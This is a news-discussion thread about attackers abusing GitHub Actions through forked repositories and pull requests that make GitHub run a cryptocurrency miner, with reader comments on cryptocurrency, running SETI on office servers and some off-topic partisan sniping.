GitHub Actions being actively abused to mine cryptocurrency on GitHub servers
GitHub Actions is currently being abused by attackers to mine cryptocurrency using GitHub's servers in an automated attack.
GitHub Actions is a CI/CD solution that makes it easy to automate all your software workflows and setup periodic tasks.
The particular attack adds malicious GitHub Actions code to repositories forked from legitimate ones, and further creates a Pull Request for the original repository maintainers to merge the code back, to alter the original code. But, an action is not required by the maintainer of the legitimate project for the attack to succeed.
BleepingComputer also observed the malicious code loads a misnamed crypto miner npm.exe from GitLab and runs it with the attacker's wallet address. Additionally, after initially reporting on this incident, BleepingComputer has come across copycat attacks targeting more GitHub projects in this manner.
Here is how it works:
The attack involves first forking a legitimate repository that has GitHub Actions enabled. It then injects malicious code in the forked version, and files a Pull Request for the original repository maintainers to merge the code back. But, in an unexpected twist, the attack does not need the maintainer of the original project to approve the malicious Pull Request.
Perdok says that merely filing the Pull Request by the malicious attacker is enough to trigger the attack. This is especially true for GitHub projects that have automated workflows setup to validate incoming Pull Requests via Actions. As soon as a Pull Request is created for the original project, GitHub's systems would execute the attacker's code which instructs GitHub servers to retrieve and run a crypto miner.
It looks like the validation of the Pull request is what triggers execution of the cryptominer. I wonder how long Github Actions will run a task before killing it?
(Score: 1, Insightful) by Anonymous Coward on Monday April 05 2021, @07:49PM (12 children)
Life finds a way, eh?
(Score: 3, Touché) by DannyB on Monday April 05 2021, @08:04PM (11 children)
I wish life could find a way to make cryptocurrency miners die off except on systems where they are welcomed. But maybe that is unwelcoming and politically incorrect.
Miners must have note from parent / guardian to work in the mines more than 16 hours / day, or on GPUs
To transfer files: right-click on file, pick Copy. Unplug mouse, plug into other computer. Right-click paste.
(Score: 0) by Anonymous Coward on Monday April 05 2021, @08:59PM (4 children)
Only if the cryptominer is black. If they're white, you can be as racist as fuck with the blessings of your democrat overlords.
(Score: 0) by Anonymous Coward on Monday April 05 2021, @09:27PM (3 children)
(Score: 0) by Anonymous Coward on Monday April 05 2021, @09:35PM (2 children)
projection, their favorite sport
kinda how we're finding out all the pedos are actually republicans and there is never any outrage from conservatives unless a democrat is blamed
truly they are disturbed people
(Score: 0) by Anonymous Coward on Monday April 05 2021, @09:49PM (1 child)
No, the Dems just get away with it. Like Hunter and Joe.
(Score: 0) by Anonymous Coward on Monday April 05 2021, @11:06PM
(Score: 4, Insightful) by Thexalon on Monday April 05 2021, @09:24PM (5 children)
How to end cryptocurrency mining:
1. Don't buy cryptocurrency, or mine it yourself.
2. Don't accept cryptocurrency as payment for your business.
3. Encourage law enforcement to take advantage of blockchain's recording technology to track down and prosecute illegal uses of cryptocurrency.
If all 3 of those happen and are widespread enough, cryptocurrency stops being valuable, and thus people will stop spending lots of real money mining it and/or stealing resources to mine it.
The only thing that stops a bad guy with a compiler is a good guy with a compiler.
(Score: -1, Troll) by Anonymous Coward on Monday April 05 2021, @09:37PM (1 child)
You Democrats love to control things, don't you?
(Score: 3, Touché) by Thexalon on Monday April 05 2021, @10:03PM
So let me get this straight: Somebody chooses by their own free will not to accept, purchase, or mine cryptocurrency, and that's me saying that I want to control people?
The only thing that stops a bad guy with a compiler is a good guy with a compiler.
(Score: 2) by inertnet on Monday April 05 2021, @11:14PM (2 children)
Why don't you require cryptocurrency miners to do their mining calculations with a pen on paper.
(Score: 2) by Thexalon on Tuesday April 06 2021, @02:18AM
That would be in fact less destructive than many of the methods miners have been using the last few years. Paper is a fairly sustainable product these days.
The only thing that stops a bad guy with a compiler is a good guy with a compiler.
(Score: 0) by Anonymous Coward on Tuesday April 06 2021, @05:47AM
Pen and paper? You are going to kick of the great slide rule arms race by those coin miners. And just you wait until they rediscover Curtas.
(Score: 5, Insightful) by crafoo on Monday April 05 2021, @09:02PM (1 child)
Ingenious, well executed, exploitation of a system like this is a thing of beauty.
"As soon as a Pull Request is created for the original project, GitHub's systems would execute the attacker's code which instructs GitHub servers to retrieve and run a crypto miner."
ooops. just running whatever random code someone submits? I wonder if this is the first time it has been exploited, or if this is just the first widespread to draw notice.
(Score: 2) by progo on Tuesday April 06 2021, @12:56AM
It must have happened before, but this time it's about "Bitcoin" and someone outside of GitHub found out.
Assuming no countermeasures exist at all (probably a bad assumption) the basic idea to get free computing done from their "Actions" process seems obvious.
(Score: 2) by legont on Tuesday April 06 2021, @12:29AM (3 children)
I had a few powerful idle servers at the office so I run SETI on them 24x7. Nobody ever asked anything. How does it differ from crypto mining I still wonder.
"Wealth is the relentless enemy of understanding" - John Kenneth Galbraith.
(Score: 0) by Anonymous Coward on Tuesday April 06 2021, @01:37AM
You aren't appropriating the resources of others for your own pecuniary benefit.
(Score: 2) by Unixnut on Tuesday April 06 2021, @08:53AM (1 child)
Well, to be fair even nowadays, running SETI (or BOINC) on office servers is considered bad practice, if not cause for disciplinary action.
The reasons it could have been done "once upon a time" are primarily:
1. Computers were not as good at power management as they are now. Whether a server was at 100% or mostly idle didn't result in a massive difference in the power bill or cooling costs, so nobody really noticed.
2. There was less general awareness on computer technology/security. Back in the 90's and 00's, the local sysadmin was very much "king of the hill" for the computers and servers, and could run things like SETI without the rest of the office knowing. Especially as it also worked as a screensaver.
3. Security was not such a big deal. Nowadays, if there is a compromise of the office, the company itself can be liable. They have security departments monitoring for things like bittorrent/crypto-miners/SETI/BOINC etc... and shutting them down. A compromise can be blamed on any one of these third party tools, even if they were not at fault, meaning there is a very high risk vs reward for running them on office machines.
Saying that, SETI/BOINC to my knowledge never had an issue of exploitation, which is impressive, when you consider they work on the pretext of sending binary executables to peoples machines in order to do local processing. Sending one compromised binary to thousands of machines at once must have been a juicy target.
Crypto-mining in that sense is a bit more secure, as you are not constantly pulling executables off the internet as part of the processing, but rather just calculating hashes that are sent to and fro. Still a risk because the crypto-miner itself needs to be downloaded off the internet itself.
(Score: 0) by Anonymous Coward on Wednesday April 07 2021, @02:17AM
SETI and BOINC are both open source. One reason why attacks on their infrastructure were relatively rare is because people compiled their own versions to squeeze out that little edge. They also routinely compared the result with the distributed version. In addition, most BOINC projects don't actually send the executable along for the ride in work units. "Applications" have their own secondary distribution system that is much more tightly controlled and there is "anonymous platform" support if you don't want to download executables at all.